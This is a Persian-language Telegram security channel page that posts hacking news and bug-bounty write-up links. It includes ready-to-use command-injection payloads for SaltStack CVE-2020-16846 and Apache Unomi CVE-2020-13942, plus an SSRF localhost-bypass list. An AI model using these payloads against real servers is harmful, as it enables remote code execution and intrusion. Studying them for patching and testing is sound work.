امنیت اطلاعات
849 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
اکسپلویت آسیب پذیری saltstack

CVE-2020-16846


PoC:

POST /run HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/x-yaml
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa%26%20open%20-a%20Calculator


#rce
#saltstack


@sec_nerd
رایت آپ کشف باگ ssrf به ارزش ۳۱ هزار دلار در سرویس مانیتورینگ ابر گوگل


https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html


#bugbounty
#google
#ssrf


@sec_nerd
رایت آپ کشف باگ در مسنجر فیسبوک که منجر به لو دادن اکسس توکن های میلیونها کاربر میشود

https://medium.com/@guhanraja/how-i-found-the-facebook-messenger-leaking-access-token-of-million-users-8ee4b3f1e5e3



#bugbounty
#writeup
#facebook


@sec_nerd
ترکیب سه آسیب پذیری برای تصاحب اکانت

SSRF-->Cloudflare bypass--> Rate limiting to account takeover.


https://medium.com/@logicbomb_1/tale-of-3-vulnerabilities-to-account-takeover-44ba631a0304


#writeup
#ssrf



@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
باگ RCE در Apache Unomi

CVE-2020-13942


PoC:
{"filters":[{"id" : "pyn3rd","filters": [{"condition": {"parameterValues": {"pyn3rd": "script::Runtime.getRuntime().exec('open -a Calculator')"},"type":"profilePropertyCondition"}}]}],"sessionId": "pyn3rd"}


#apache
#rce

@sec_nerd
یک منبع مناسب برای تهیه wordlist با هدفهای متنوع

https://wordlists.assetnote.io/


#wordlist
#fuzz
#pentest


@sec_nerd
یک رساله دکترا در خصوص تولید اکسپلویت

Greybox Automatic Exploit Generation for Heap Overflows in Language Interpreters

https://seanhn.files.wordpress.com/2020/11/heelan_phd_thesis.pdf


توضیحات مختصر

https://sean.heelan.io/2020/11/18/phd-thesis-greybox-automatic-exploit-generation-for-heap-overflows-in-language-interpreters/


#overflow
#exploit


@sec_nerd
استفاده غیرامن از تابع unserialize در فریمورک zend منجر به RCE میشود

https://gist.github.com/YDyachenko/6f60709ce0fc346d0cc0252e07c6aa38

#php
#poi
#rce

@sec_nerd
رتبه بندی ده زبان برتر برنامه نویسی که توسعه دهندگان علاقه بیشتری به آنها داشته اند در سال ۲۰۲۰

1 Rust lang
2 TypeScript
3 Python
4 Kotlin
5 Go
6 Julia
7 Dart
8 C#
9 Swift
10 JavaScript

https://insights.stackoverflow.com/survey/2020?#technology-most-loved-dreaded-and-wanted-languages-loved

#dev


@sec_nerd
نتایج اسکن کل اینترنت برای پورت ۴۴۳ که توسط یک فرد نیکوکار انجام شده

https://mega.nz/file/7NZW2Jha#YsO0mlag-R1G7fJI4FQVLsAkW8-VBYVLV_8oYTRZgCs


#scan
#enum


@sec_nerd
SSRF Bypass list for localhost (127.0.0.1):

https://127.1/
https://0000::1:80/
https://[::]:80/
https://2130706433/
https://[email protected]
https://0x7f000001/
https://017700000001
https://0177.00.00.01
https://⑯⑨。②⑤④。⑯⑨。②⑤④/
https://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
https://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
https://②⑧⑤②⓪③⑨①⑥⑥:80/
https://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
https://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/
https://0xd8.0x3a.0xd6.0xe3
https://0xd83ad6e3
https://0xd8.0x3ad6e3
https://0xd8.0x3a.0xd6e3
https://0330.072.0326.0343
https://000330.0000072.0000326.00000343
https://033016553343
https://3627734755
https://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37
https://216.0x3a.00000000326.0xe3
localtest.iss.one
https://newyork.localtest.iss.one
https://mysite.localtest.iss.one
https://redirecttest.localtest.iss.one
sub1.sub2.sub3.localtest.iss.one
https://bugbounty.dod.network
https://spoofed.burpcollaborator.net


#ssrf
#bugbounty
#pentest


@sec_nerd